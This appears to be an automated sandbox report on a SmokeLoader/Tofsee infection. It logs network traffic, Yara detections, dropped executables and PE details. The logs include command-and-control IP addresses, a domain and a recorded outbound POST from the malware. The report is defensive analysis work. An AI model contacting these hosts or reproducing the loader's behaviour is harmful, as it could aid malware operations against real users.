34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 19:51:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 60 4d 87 33 c5 de 66 b2 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTev`M3fdP0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 19:51:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 19:51:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 4a e5 a8 84 70 bc 57 dd 40 d6 f6 27 87 27 ed c3 91 53 2d e6 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9JpW@''S-c0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 19:51:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 19:51:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 48 e5 af 8d 70 bc 57 dd 40 d6 f6 2e 84 2a e8 c3 90 53 2e ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9HpW@.*S.c0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 19:51:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 13 Jan 2022 19:51:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 47 ec a9 8a 70 bc 57 dd 40 d6 f7 26 80 24 e7 c3 91 54 22 e0 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9GpW@&$T"c0

Source: unknown	TCP traffic detected without corresponding DNS query: 185.186.142.166
Source: unknown	TCP traffic detected without corresponding DNS query: 185.186.142.166
Source: unknown	TCP traffic detected without corresponding DNS query: 185.186.142.166
Source: unknown	TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171
Source: unknown	TCP traffic detected without corresponding DNS query: 185.7.214.171

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hudnwo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 170Host: host-data-coin-11.com

Source: unknown	HTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.5:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.5:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.38.221:443 -> 192.168.2.5:49800 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49831 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49839 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected SmokeLoader

Show sources

Source: Yara match	File source: 1.1.emPJndhuvA.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.0.tiftjuh.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.0.tiftjuh.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.tiftjuh.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.1.3D67.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.tiftjuh.4615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.emPJndhuvA.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.1.tiftjuh.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.emPJndhuvA.exe.5315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.3D67.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.0.tiftjuh.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.3D67.exe.4615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.310069625.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.386280466.0000000001F30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.386498287.0000000002431000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.295057363.0000000003A61000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.360645909.00000000004D1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.309813053.0000000000530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.360518485.00000000004A0000.00000004.00000001.sdmp, type: MEMORY

Source: 952.exe, 0000001E.00000002.412786199.000000000077A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Spam, unwanted Advertisements and Ransom Demands:

Yara detected Tofsee

Show sources

Source: Yara match	File source: 44.3.vodibdaj.exe.560000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.3.952.exe.5a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.vodibdaj.exe.610000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.952.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.952.exe.580e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.vodibdaj.exe.540e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.vodibdaj.exe.610000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.952.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.vodibdaj.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.vodibdaj.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001E.00000002.412229320.0000000000580000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.383697292.00000000005A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.417710033.0000000000540000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.417504443.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000002.543176167.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.410807233.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.417841182.0000000000610000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.415295647.0000000000560000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 952.exe PID: 1068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vodibdaj.exe PID: 6484, type: MEMORYSTR

System Summary:

PE file has nameless sections

Show sources

Source: 9054.exe.3.dr	Static PE information: section name:
Source: 9054.exe.3.dr	Static PE information: section name:
Source: 9054.exe.3.dr	Static PE information: section name:
Source: 9054.exe.3.dr	Static PE information: section name:
Source: 9054.exe.3.dr	Static PE information: section name:
Source: 9054.exe.3.dr	Static PE information: section name:
Source: B1F6.exe.3.dr	Static PE information: section name:
Source: B1F6.exe.3.dr	Static PE information: section name:
Source: B1F6.exe.3.dr	Static PE information: section name:
Source: B1F6.exe.3.dr	Static PE information: section name:
Source: B1F6.exe.3.dr	Static PE information: section name:
Source: B1F6.exe.3.dr	Static PE information: section name:

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3104 -ip 3104

Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: 0_2_00411CED
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: 0_2_004110B1
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: 0_2_004115F5
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: 0_2_00412A4E
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: 0_2_0040C2F9
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: 0_2_00410B6D
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: 0_2_0040437E
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: 0_2_00533253
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: 0_2_005331FF
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: 1_2_00402A5F
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: 1_2_00402AB3
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: 1_1_00402A5F
Source: C:\Users\user\Desktop\emPJndhuvA.exe	Code function: 1_1_00402AB3
Source: C:\Users\user\AppData\Roaming\tiftjuh	Code function: 20_2_00463253
Source: C:\Users\user\AppData\Roaming\tiftjuh	Code function: 20_2_004631FF
Source: C:\Users\user\AppData\Roaming\tiftjuh	Code function: 21_2_00402A5F
Source: C:\Users\user\AppData\Roaming\tiftjuh	Code function: 21_2_00402AB3
Source: C:\Users\user\AppData\Local\Temp\2819.exe	Code function: 22_2_004027CA
Source: C:\Users\user\AppData\Local\Temp\2819.exe	Code function: 22_2_00401FF1
Source: C:\Users\user\AppData\Local\Temp\2819.exe	Code function: 22_2_0040158E
Source: C:\Users\user\AppData\Local\Temp\2819.exe	Code function: 22_2_004015A6
Source: C:\Users\user\AppData\Local\Temp\2819.exe	Code function: 22_2_004015BC
Source: C:\Users\user\AppData\Local\Temp\2819.exe	Code function: 22_2_00411065
Source: C:\Users\user\AppData\Local\Temp\2819.exe	Code function: 22_2_00412A02
Source: C:\Users\user\AppData\Local\Temp\2819.exe	Code function: 22_2_0040CAC5
Source: C:\Users\user\AppData\Local\Temp\2819.exe	Code function: 22_2_00410B21
Source: C:\Users\user\AppData\Local\Temp\2819.exe	Code function: 22_2_004115A9
Source: C:\Users\user\AppData\Local\Temp\2819.exe	Code function: 22_2_0208160C
Source: C:\Users\user\AppData\Local\Temp\2819.exe	Code function: 22_2_020815DE
Source: C:\Users\user\AppData\Local\Temp\2819.exe	Code function: 22_2_020815F6
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Code function: 25_2_0041004B
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Code function: 25_2_00411075
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Code function: 25_2_00411CB1
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Code function: 25_2_004115B9
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Code function: 25_2_0040462E
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Code function: 25_2_00412B43
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Code function: 25_2_00410B31
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Code function: 25_2_00463253
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Code function: 25_2_004631FF
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Code function: 28_2_00402A5F
Source: C:\Users\user\AppData\Local\Temp\3D67.exe	Code function: 28_2_00402AB3
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_00410800
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_00411280
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_004103F0
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_004109F0
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_00590A50
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_00590640
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_00590C40
Source: C:\Users\user\AppData\Local\Temp\FD2B.exe	Code function: 29_2_005914D0
Source: C:\Users\user\AppData\Local\Temp\952.exe	Code function: 30_2_0040C913
Source: C:\Users\user\AppData\Local\Temp\13E2.exe	Code function: 32_2_02F796F0
Source: C:\Users\user\AppData\Local\Temp\13E2.exe	Code function: 32_2_02F70470
Source: C:\Users\user\AppData\Local\Temp\13E2.exe	Code function: 32_2_02F70460
Source: C:\Users\user\AppData\Local\Temp\13E2.exe	Code function: 32_2_0300DE18
Source: C:\Users\user\AppData\Local\Temp\13E2.exe	Code function: 32_2_03008658
Source: C:\Users\user\AppData\Local\Temp\13E2.exe	Code function: 32_2_03008DE8
Source: C:\Users\user\AppData\Local\Temp\13E2.exe	Code function: 32_2_03008DF8

Source: C:\Users\user\AppData\Local\Temp\952.exe

Code function: 30_2_00401280 ShellExecuteExW,lstrlenW,GetStartupInfoW,CreateProcessWithLogonW,WaitForSingleObject,CloseHandle,CloseHandle,GetLastError,GetLastError,VirtualAlloc,

Source: emPJndhuvA.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: emPJndhuvA.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: emPJndhuvA.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 45F8.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 45F8.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 45F8.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2819.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2819.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 2819.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 3D67.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 3D67.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 3D67.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 3D67.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: FD2B.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: FD2B.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: FD2B.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: FD2B.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 952.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 952.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 952.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 952.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 5F8C.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 5F8C.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 5F8C.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 5F8C.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CA61.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CA61.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CA61.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: tiftjuh.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: tiftjuh.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: tiftjuh.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vodibdaj.exe.30.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vodibdaj.exe.30.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vodibdaj.exe.30.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vodibdaj.exe.30.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Windows\System32\svchost.exe	Section loaded: xboxlivetitleid.dll
